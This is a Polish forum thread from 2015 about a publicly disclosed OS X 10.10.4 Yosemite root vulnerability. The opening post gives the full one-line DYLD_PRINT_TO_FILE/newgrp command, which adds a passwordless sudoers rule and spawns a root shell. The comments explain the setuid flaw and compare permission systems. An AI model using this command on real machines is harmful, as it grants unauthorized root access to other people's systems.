Root na Maku w jednej linijce, OS X 10.10 Yosemite jest bezbronny

eśli chcecie uzyskać roota w najnowszej stabilnej wersji OS X 10.10.4 Yosemite, wystarczy uruchomić powłokę systemową i wpisać następującą komendę: echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

garmet z dodany: 23.07.2015, 14:05:36

268
Odpowiedz

Komentarze (268)

najlepsze

a.....t

konto usunięte 23.07.2015, 14:09:57

To się nazywa zaklęcie. Harry Potter przy tym wymięka ;)

jeanpaul

23.07.2015, 14:56:27

To się nazywa zaklęcie. Harry Potter przy tym wymięka ;)

@aksnet: jak dla kogo zaklecie, nie uzywam mak'a, w pracy siedze "przy windows" ale ta komenda to nic innego jak nadpisanie pliku okreslajacego kto i jak moze uzywac komendy sudo (wywolanie programu z poziomu root'a / administratora dla uzytkownikow widnows). Nowy plik zawiera prawa do wykonania wszystkich polecen bez hasla i nastepnei wywolanie konsoli dla root'a. Domyslam sie tylko celem potwierdzenia ze

jeanpaul

23.07.2015, 18:33:52

to w czym problem? Na czym polega bezbronność OSX? Mój Arch też "bezbronny" bo jako root mam dostęp do /etc/sudoers? Co pominąłem?

@Djuna: problem polega na tym ze ten program do drukowania nie powinien miec ustawionego setuid i byc wlasnoscia root'a. setuid pozwala na szybkie obejscie wszystkich zabezpieczen i tylko wybrane, dobrze sprawdzone programy,. ktore swoja funkcjonalnoscia nie pozwalaja na modyfikcaje wrazliwych elementow systemu moga dostac setuid.

Twoj arch jest bezpieczyn bo

jaksiepatrzy

23.07.2015, 22:53:50

Najnowszy exploit na Maka pokazuje, że zespół bezpieczeństwa Apple powinien jednak zająć się czymś prostszym, np. robieniem tapet.

napisał dziennikarz www.dobreprogramy.pl

OMGiamSMURF

24.07.2015, 06:03:16

-4

@jaksiepatrzy: śmiechłem #bojowkaandroid tak bardzo #biedakicebulaki

o gurwa, faktycznie

@RuntimeException:
widać, "znak zachęty" zmienił się z '$' na '#', co oznacza uprawnienia roota; po drodze nie było promptu o hasło

l.....e

konto usunięte 23.07.2015, 20:05:45

@januszkarwasz: u mnie też działa :D

smk666

23.07.2015, 14:28:29

#glupiepytanie
Na nowym macu użytkownik fabrycznie nie może w ogóle korzystać z uprawnień roota czy może chodzi tutaj tylko o potencjalny wektor ataku a su/sudo działa jak bozia przykazała na niegrzebanym OSXie?

StayAlive

23.07.2015, 15:57:25

@smk666: Bezpieczeństwo osx i linuxów (z resztą nie tylko bo unixów też) polega na tym (między innymi), że istnieje ścisła kontrola uprawnień - bez roota nic nie zrobisz. Tutaj atakujący ma otwartą furtkę.

Nawet taki żart był, że po wyciągnięciu wtyczki z sieci maszyna linuxowa powinna zapytać o uprawnienia roota, a jeśli ich brak - kontynuować pracę.

t.....z

konto usunięte 23.07.2015, 16:21:06

Bezpieczeństwo osx i linuxów (z resztą nie tylko bo unixów też) polega na tym (między innymi), że istnieje ścisła kontrola uprawnień - bez roota nic nie zrobisz.

@StayAlive: W Windowsie, począwszy od Visty istnieje podobny mechanizm - User Account Control. Jednak znaczna część użytkowników to wyłącza, bo ciągłe potwierdzanie wykonania procedury wymagającej wyższych uprawnień ich irytuje. A potem dziwota, że pecety z Windowsem są zawirusowane.